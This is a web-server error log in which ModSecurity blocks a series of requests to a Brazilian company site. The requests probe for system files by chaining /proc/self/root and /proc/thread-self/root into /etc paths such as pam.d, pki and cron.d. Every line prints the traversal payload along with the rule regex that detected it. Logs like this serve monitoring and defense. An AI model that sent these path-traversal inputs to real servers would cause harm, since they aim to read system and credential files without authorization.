[Tue Mar 17 10:45:00.309861 2026] [:error] [pid 18604:tid 140411590858496] [client 74.7.243.203:53136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla3EBd0UqwxWindINvUwAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:01.861486 2026] [:error] [pid 1731:tid 140411649607424] [client 74.7.243.203:53140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla3Qb2qCuy5irgBMjPhAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:04.427979 2026] [:error] [pid 1731:tid 140411683178240] [client 74.7.243.203:53156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla4Ab2qCuy5irgBMjPhwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:05.828120 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.243.203:53166] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla4QeiSKl8TjouI-YI5QAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:07.239542 2026] [:error] [pid 18604:tid 140411649607424] [client 74.7.243.203:53178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla40Bd0UqwxWindINvVwAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:09.126956 2026] [:error] [pid 18709:tid 140411548894976] [client 74.7.243.203:53182] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla5DarLhPAjZGI1b21UQAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:10.530605 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:37222] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla5qBJNF7axNlVR0UD8QAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:11.898997 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.243.203:37236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla56BJNF7axNlVR0UD9gAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:14.837277 2026] [:error] [pid 1016:tid 140411674785536] [client 74.7.243.203:37242] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla6pqmL8PQht4WJFlO_wAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:16.216003 2026] [:error] [pid 1731:tid 140411666392832] [client 74.7.243.203:37244] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla7Ab2qCuy5irgBMjPiwAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:18.503310 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.243.203:37256] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla7QeiSKl8TjouI-YI6gAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:19.868808 2026] [:error] [pid 18709:tid 140411599251200] [client 74.7.243.203:37268] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla7zarLhPAjZGI1b21VgAAA5E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:20.695766 2026] [:error] [pid 1016:tid 140411641214720] [client 74.7.241.46:34624] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla8JqmL8PQht4WJFlPBQAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 10:45:22.367277 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.243.203:52476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla8tCmCSWTlPouqorToQAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:23.768557 2026] [:error] [pid 1016:tid 140411733534464] [client 74.7.243.203:52480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla85qmL8PQht4WJFlPBgAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:24.010894 2026] [:error] [pid 1016:tid 140411683178240] [client 74.7.243.203:52480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla9JqmL8PQht4WJFlPBwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:26.661609 2026] [:error] [pid 7437:tid 140411574073088] [client 74.7.243.203:52494] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla9geiSKl8TjouI-YI8AAAA9Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:28.060672 2026] [:error] [pid 1016:tid 140411649607424] [client 74.7.243.203:52496] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla-JqmL8PQht4WJFlPCQAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:30.461098 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.203:52500] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla-qBJNF7axNlVR0UECQAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:33.186565 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.243.203:41708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla_aBJNF7axNlVR0UEDwAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:45:34.492293 2026] [:error] [pid 18709:tid 140411699963648] [client 74.7.243.203:41716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abla_jarLhPAjZGI1b21WwAAA4U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
